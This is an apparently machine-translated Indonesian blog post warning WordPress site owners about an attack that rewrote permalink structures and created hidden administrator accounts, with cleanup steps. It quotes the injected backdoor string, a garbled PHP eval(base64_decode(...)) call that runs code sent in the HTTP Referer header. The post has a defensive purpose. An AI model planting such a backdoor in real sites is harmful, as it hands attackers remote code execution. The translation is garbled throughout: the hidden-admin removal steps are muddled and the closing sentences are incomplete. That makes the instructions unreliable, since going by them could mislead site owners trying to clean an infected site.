Injeksi SQL WordPress: Serangan Utama

Serangan SQL baru-baru ini mengenai banyak situs di mana kode dimasukkan ke situs Anda. Injeksi MySQL ini memengaruhi permalink Anda dan menjadikannya tidak efektif. Akibatnya, URL posting blog Anda tidak akan berfungsi. Banyak blog WordPress telah diserang dalam serangan ini berkat Andy Soward, yang telah menarik perhatian kami.

Sebagai akibat dari serangan ini, salah satu kode berikut ditambahkan ke struktur permalinknya:

% & ({$ {eval (base64_decode ($ _ SERVER (HTTP_REFERER))))}} |. +) &%

"/?

Kutipan ini mengandung semua tautan permanen di situs Anda dan hanya dapat diubah jika dihapus secara manual.

Pergi ke: untuk memperbaikinya

Pengaturan> Permalinks dan hapus kode di atas dan ganti kode default Anda.

Lalu pergi ke pengguna. Anda akan melihat bahwa ada lebih dari satu administrator. Anda tidak akan melihat nama Anda di daftar, tetapi Anda akan melihat peningkatan jumlahnya. Karena itu, Anda harus melihat semua pengguna dan menemukan yang terakhir terdaftar. Gulirkan pengguna ini dan dapatkan tautannya. Ubah userid = kode dengan memasukkan nomor ini 1 Tambah. Jika pengguna terakhir yang Anda lihat menggunakan 2 ditambahkan 1 tambahkan dan lakukan 3, Anda akan menemukan bahwa administrator tersembunyi memiliki kode nama yang aneh. Hapus kode dan buatlah menjadi pelanggan. Kemudian kembali dan hapus.

Ini harus menyelesaikan masalah. Anda juga dapat menghapusnya hanya dengan membuka PHPMyAdmin Anda. Karena Anda melihat pengguna di sana.

Kami hanya ingin mempublikasikan berita ini sesegera mungkin sehingga pengguna kami dapat memperbaruinya. Pastikan blog Anda tidak terinfeksi. Kami berharap WordPress akan segera dirilis.

Jika Anda belum menerapkan langkah-langkah ini untuk melindungi area administrasi WordPress Anda.